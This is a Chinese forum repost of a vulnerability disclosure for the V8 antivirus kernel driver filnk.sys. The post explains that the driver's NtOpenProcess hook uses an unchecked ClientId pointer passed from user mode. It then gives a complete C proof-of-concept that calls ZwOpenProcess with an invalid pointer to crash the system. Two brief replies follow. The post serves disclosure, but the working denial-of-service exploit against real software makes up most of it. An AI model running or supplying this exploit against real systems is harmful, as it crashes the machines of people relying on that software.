V8智能杀毒多处内核拒绝服务漏洞[不知道是真是假]

荷韵诗

=================转贴=================================
====原贴地址：http://hi.baidu.com/minzhenfei/item/ea1516535d9a46ded48bac03

V8杀毒软件的动态防御驱动filnk.sys在内核对多个系统函数进行了hook，但是对Ring3传递进来的参数都没有任何的有效性检查就直接使用了。因此，造成了内核拒绝服务漏洞。

这里以其Hook的NtOpenProcess为例，函数偏移6A8C0


如上图可以看出，Ring3传递进来的ClientId参数，其在内核中就直接使用了，并没有做任何有效性检查。


测试代码：
/*
     作者：莫灰灰
     博客：http://hi.baidu.com/new/minzhenfei
     描述：费尔V8智能杀毒内核拒绝服务漏洞测试程序
*/
#include "stdafx.h"
#include <windows.h>

int _tmain(int argc, _TCHAR* argv[])
{
        HMODULE hMod = LoadLibrary(L"ntdll.dll");

        if (hMod)
        {
                PVOID p = GetProcAddress(hMod, "ZwOpenProcess");

                if (p)
                {
                        printf("Your System Will Crash, Press any key to Continue.\n");
                        getchar();

                        __asm{
                                push 0x80000000
                                push 0
                                push 1
                                push 0
                                call p
                        }
                }
        }

        return 0;
}

流浪歌者

这是高手啊～～

JillPal

以前发现者本人都发过的。